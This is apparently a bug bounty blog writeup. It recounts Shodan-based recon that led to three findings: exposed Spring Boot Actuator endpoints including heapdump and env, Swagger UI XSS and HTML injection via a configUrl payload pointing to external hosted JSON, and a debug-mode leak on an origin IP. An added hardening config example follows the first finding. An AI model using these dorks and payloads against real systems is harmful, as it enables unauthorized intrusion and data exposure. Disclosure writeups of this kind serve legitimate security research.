Hey there fellow hunters! Happy to share with you how I got three valid bugs on a VDP program with Shodan's help!
The bugs are:
Information disclosure, marked as P1 (Critical)
XSS && HTMLi on Swagger UI
Information Exposure Through Debug Information

In the last days of my bug bounty journey I decided to learn new techniques for my recon process, so what had I never learned before? Yeah, that's Shodan. Luckily I have a good friend who suggested a great video for learning Shodan by the master of recon Orwa Atyat (I will put the link at the end), so let's continue.
The Setup
First I prepared Shodan to search for the target domain's IPs, using this dork:
Ssl.cert.subject.CN:"target.com"
And I got many, many IPs.
Now, to make it easier, I clicked the blue word 'More', and you should see this:
In the country option, change it to 'http.title' so that the HTTP title is shown above every IP, which makes it easy to spot the important IPs :)
## The first bug: Information disclosure via Spring Boot Actuator paths

When I searched through the IPs by title I saw an interesting one: 'Whitelabel Error Page'. That error was strange to me, so I opened the link in the browser and saw that page :) Then I tried some fuzzing with the powerful tool dirsearch and a custom wordlist on that IP, and got many paths like:
/actuator/ ->> the main path
/actuator/heapdump
/actuator/beans
/actuator/caches
/actuator/conditions
/actuator/configprops
/actuator/env
/actuator/threaddump
/actuator/mappings
/actuator/loggers
Now you ask me what those paths are and what they contain? Here I explain some of them:
/actuator/heapdump
A heap dump is a snapshot of an application's memory at a given time. It typically contains objects, variables, and references that were in use when the dump was generated. While intended for debugging, an exposed heap dump can pose security risks if it contains sensitive information. Potential security risks:
Exposure of Sensitive Data — Heap dumps may contain authentication tokens, API keys, session identifiers, or even user-related data that should not be publicly accessible.
Information Disclosure — Internal application logic, class structures, and function references can be extracted, aiding an attacker in understanding backend mechanisms.
Compliance & Privacy Risks — If user data is present, this could lead to compliance concerns related to data protection regulations (e.g., GDPR, CCPA).
Since this file is publicly accessible, an attacker could analyze its contents to gain unintended insights into the application’s internals, increasing the attack surface. I recommend restricting access to heap dumps and ensuring they are not exposed in production environments.
/actuator/beans
The /actuator/beans endpoint provides a full list of all Spring Beans in the application context. This can be dangerous because:
Application Structure Disclosure — Attackers can map out service names, component dependencies, and internal classes, helping in targeted attacks.
Sensitive Functionality Exposure — If certain beans are related to authentication, database connections, or API interactions, an attacker may leverage this knowledge to craft more precise attacks.
Those are some of the paths. Then I reported it, and guess what? Yeah, it was marked as P1 (Critical).
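As an added defender-side example (not part of this writeup, and not the target's code): a Spring Boot 3 / Spring Security 6 filter chain that stops /actuator/** from being reachable anonymously, which is the fix for the exposure described above. The class name and the ACTUATOR role are assumptions; it assumes the application already uses Spring Security.

```java
import org.springframework.boot.actuate.autoconfigure.security.servlet.EndpointRequest;
import org.springframework.boot.actuate.health.HealthEndpoint;
import org.springframework.boot.actuate.info.InfoEndpoint;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.core.annotation.Order;
import org.springframework.security.config.Customizer;
import org.springframework.security.config.annotation.web.builders.HttpSecurity;
import org.springframework.security.web.SecurityFilterChain;

// Hypothetical config class name; added example, not from the writeup.
@Configuration
public class ActuatorSecurityConfig {

    // Pair this with application.properties so that only a minimal set of
    // endpoints is exposed over HTTP at all (the weak setting that leads to
    // the finding above is "management.endpoints.web.exposure.include=*"):
    //   management.endpoints.web.exposure.include=health,info
    //   management.endpoint.health.show-details=when-authorized

    @Bean
    @Order(1) // evaluated before the application's own security chain
    SecurityFilterChain actuatorSecurityFilterChain(HttpSecurity http) throws Exception {
        http
            // this chain only applies to Actuator endpoints (/actuator/**)
            .securityMatcher(EndpointRequest.toAnyEndpoint())
            .authorizeHttpRequests(auth -> auth
                // liveness/readiness probes stay reachable without credentials
                .requestMatchers(EndpointRequest.to(HealthEndpoint.class, InfoEndpoint.class))
                    .permitAll()
                // heapdump, env, beans, mappings, loggers, ... require the
                // ACTUATOR role (assumed role name) for every request
                .anyRequest().hasRole("ACTUATOR"))
            .httpBasic(Customizer.withDefaults());
        return http.build();
    }
}
```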
## The second bug: XSS && HTMLi on Swagger UI

Also, when searching through the IPs by title, I saw a title with 'Swagger UI'. I opened it quickly because I had already found a bug with it that I wrote about in this writeup: https://medium.com/@hamdiyasin135/the-power-of-swagger-ui-docs-broken-access-control-a3b57fb035bd
So here I checked the version of Swagger UI and noticed it was an old version that might be vulnerable to XSS and HTMLi, so I searched for an exploit for it and found that it's vulnerable in the parameter /?configUrl.
That parameter is used to load an external config into Swagger UI, so I used this payload for the XSS: https://target.com/?configUrl=https://xss.smarpo.com/test.json
And for HTMLi I used this payload: /?configUrl=https://gist.githubusercontent.com/zenelite123/af28f9b61759b800cb65f93ae7227fb5/raw/04003a9372ac6a5077ad76aa3d20f2e76635765b/test.json
And at the end the bug was triaged :
## The third bug: Information Exposure Through Debug Information

While I was testing subdomains I found a strange one: when I opened it I got an error telling me that debug mode is not enabled on that subdomain. So I had a great idea: what if I searched for the origin IP of that subdomain? Maybe debug mode is enabled there? I didn't know.
So I searched for the origin IP of that subdomain on Shodan and in the end I got it, and guess what?! Debug mode was enabled on it!!!!
And I observed that it exposed:
Multiple internal paths
Detailed traceback errors
Server configuration details
Backend framework information
And the bug was triaged also :)